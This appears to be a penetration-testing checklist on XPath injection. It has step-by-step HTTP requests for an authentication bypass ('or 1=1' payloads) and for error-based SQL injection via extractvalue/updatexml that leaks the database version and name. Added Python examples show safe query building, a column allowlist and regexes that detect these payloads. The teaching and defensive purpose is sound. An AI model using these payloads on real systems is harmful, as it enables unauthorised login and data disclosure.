XPath Injection

Check List

Methodology

Black Box

Bypass Authentication via XPath Injection

1. Log in to the target site and complete the authentication process.

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

UserName=testuser&Password=test

2. Using Burp Suite, intercept the authentication request and verify that the application uses an XML document to store user information.

3. Fill in the username and password fields on the authentication page, submit the form, and follow the submitted request in the interceptor.

4. In the intercepted request, check whether the parameters are embedded in an XPath predicate of the form

[UserName/text()='" & Request("UserName") & "' And Password/text()='" & Request("Password") & "']

5. Enter a valid value in the password field (test).

6. In the username field, inject the following payload

test' or 1=1 or 'a'='a

The request with the payload injected:

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

UserName=test' or 1=1 or 'a'='a&Password=test

7. Submit the login request and observe that the XPath query becomes

[UserName/text()='test' or 1=1 or 'a'='a' And Password/text()='test']

8. If the injected condition 1=1 evaluates as true and authentication succeeds, the vulnerability is confirmed.
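Added example, not part of this checklist: the Python below reproduces the concatenation pattern from step 4 beside a safe builder that encodes untrusted input as an XPath string literal (using concat() when a value contains both quote kinds, since XPath 1.0 has no escape sequences), and a check that flags login bodies like the one in step 6. The element names UserName and Password come from the page; the sample request bodies are constructed for this example.

```python
import re
from urllib.parse import parse_qs


def build_vulnerable_predicate(username: str, password: str) -> str:
    """Predicate built by string concatenation, as the checklist's step 4 shows.
    Whatever the user types becomes part of the query structure."""
    return ("[UserName/text()='" + username
            + "' And Password/text()='" + password + "']")


def xpath_literal(value: str) -> str:
    """Encode an untrusted string as an XPath 1.0 string literal.
    XPath has no backslash escapes, so a value containing both ' and "
    has to be assembled with concat()."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    pieces = value.split("'")
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in pieces) + ")"


def build_safe_predicate(username: str, password: str) -> str:
    """Same lookup with every user value kept inside a string literal.
    XPath operators are case-sensitive, so the conjunction is 'and'."""
    return ("[UserName/text()=" + xpath_literal(username)
            + " and Password/text()=" + xpath_literal(password) + "]")


# Heuristic for values that try to leave a string literal or inject XPath syntax.
INJECTION_HINTS = re.compile(
    r"""['"]\s*(or|and)\b|\b\d+\s*=\s*\d+\b|\btext\(\)|\bcontains\(""",
    re.IGNORECASE,
)


def looks_like_xpath_injection(value: str) -> bool:
    return INJECTION_HINTS.search(value) is not None


# Constructed sample login bodies (same parameter names as the page's requests).
SAMPLE_LOGIN_BODIES = [
    "UserName=testuser&Password=test",
    "UserName=test' or 1=1 or 'a'='a&Password=test",
    "UserName=alice&Password=s3cret",
    "UserName=bob&Password=' or ''='",
]


def scan_login_bodies(bodies):
    """Return (parameter, value) pairs whose value looks like an injection attempt."""
    flagged = []
    for body in bodies:
        params = parse_qs(body, keep_blank_values=True)
        for name in ("UserName", "Password"):
            for value in params.get(name, []):
                if looks_like_xpath_injection(value):
                    flagged.append((name, value))
    return flagged


if __name__ == "__main__":
    payload = "test' or 1=1 or 'a'='a"
    print("vulnerable:", build_vulnerable_predicate(payload, "test"))
    print("safe:      ", build_safe_predicate(payload, "test"))
    for name, value in scan_login_bodies(SAMPLE_LOGIN_BODIES):
        print("flagged", name, repr(value))
```

With the safe builder the step 6 payload ends up inside a double-quoted literal, so the `or 1=1` text is compared against the UserName node rather than parsed as XPath. Libraries that support XPath variables (lxml's `xpath(expr, u=value)` binding, for instance) are preferable to string assembly; the literal encoding above is the fallback when only a plain evaluator is available.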


XPath Injection via product API

1. Log in to the target site and intercept the requests using Burp Suite.

2. Look for product APIs that take database-like parameters, such as the getcolumns parameter

GET /api/product.php?parent_callid=[VALUE]&callid=[VALUE]&getcolumns=

3. Send a normal request to confirm that the endpoint responds successfully without errors.

4. Modify the getcolumns parameter with the following payload to trigger error-based SQL injection through the database's XPath functions (extractvalue/updatexml), whose XPath syntax error echoes the injected value

extractvalue(1,concat(0x7e,version()))

5. Send the following HTTP request

GET /api/product.php?parent_callid=mobile&callid=123&getcolumns=extractvalue(1,concat(0x7e,version()))

6. Observe that the server returns an error message containing the database version in the XPath syntax error response.

7. Modify the getcolumns parameter again with the following payload to extract the current database name

updatexml(1,concat(0x7e,database()),1)

8. Send the following HTTP request

GET /api/product.php?parent_callid=mobile&callid=123&getcolumns=updatexml(1,concat(0x7e,database()),1)

9. Observe that the server returns an XPath syntax error message disclosing the current database name.
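Added example, not part of this checklist: a column name cannot be bound as a query parameter, so the defence for a parameter like getcolumns is an allowlist of identifiers, with database errors never echoed to the client. The Python below contrasts splicing the parameter into the query (the pattern the steps above exploit) with an allowlisted builder, and scans access-log lines for the extractvalue/updatexml calls used in steps 5 and 8. The query shape `SELECT ... FROM product`, the column allowlist and the log lines are assumptions constructed for this example; the request paths and payloads are the ones on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of columns the product API may expose (constructed).
PRODUCT_COLUMNS = frozenset({"id", "name", "price", "stock"})


def build_vulnerable_sql(getcolumns: str) -> str:
    """Assumed backend shape: the parameter is spliced into the column list.
    Any function call, such as extractvalue(...), is then executed by the database."""
    return "SELECT " + getcolumns + " FROM product WHERE callid = ?"


def requested_columns(getcolumns: str):
    return [c.strip() for c in getcolumns.split(",") if c.strip()]


def is_valid_getcolumns(getcolumns: str) -> bool:
    """True only when every requested name is a known column."""
    cols = requested_columns(getcolumns)
    return bool(cols) and all(c in PRODUCT_COLUMNS for c in cols)


def build_safe_sql(getcolumns: str) -> str:
    """Allowlisted builder: unknown identifiers are rejected before any SQL exists.
    The caller should turn ValueError into a generic 4xx, not a database error page."""
    cols = requested_columns(getcolumns)
    if not cols:
        raise ValueError("no columns requested")
    bad = [c for c in cols if c not in PRODUCT_COLUMNS]
    if bad:
        raise ValueError("unknown column(s): " + ", ".join(bad))
    return ("SELECT " + ", ".join("`" + c + "`" for c in cols)
            + " FROM product WHERE callid = ?")


# MySQL XML functions whose error text echoes their argument.
MYSQL_XML_FUNCS = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)

# Constructed access-log lines; the two request paths match steps 5 and 8.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET /api/product.php?parent_callid=mobile&callid=123&getcolumns=name,price HTTP/1.1" 200',
    '10.0.0.9 - - "GET /api/product.php?parent_callid=mobile&callid=123&getcolumns=extractvalue(1,concat(0x7e,version())) HTTP/1.1" 500',
    '10.0.0.9 - - "GET /api/product.php?parent_callid=mobile&callid=123&getcolumns=updatexml(1,concat(0x7e,database()),1) HTTP/1.1" 500',
]


def scan_access_log(lines):
    """Return (parameter, value) pairs carrying extractvalue/updatexml calls."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for name, values in query.items():
            for value in values:
                if MYSQL_XML_FUNCS.search(value):
                    hits.append((name, value))
    return hits


if __name__ == "__main__":
    payload = "extractvalue(1,concat(0x7e,version()))"
    print("vulnerable:", build_vulnerable_sql(payload))
    print("allowlisted:", build_safe_sql("name, price"))
    print("payload accepted by allowlist?", is_valid_getcolumns(payload))
    for name, value in scan_access_log(SAMPLE_ACCESS_LOG):
        print("flagged", name, value)
```

The 500 status paired with a flagged parameter is the detection signal worth alerting on: the checklist's steps 6 and 9 rely on the database error reaching the client, so a generic error response removes the information leak even where the allowlist is missing.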


White Box

Cheat Sheet
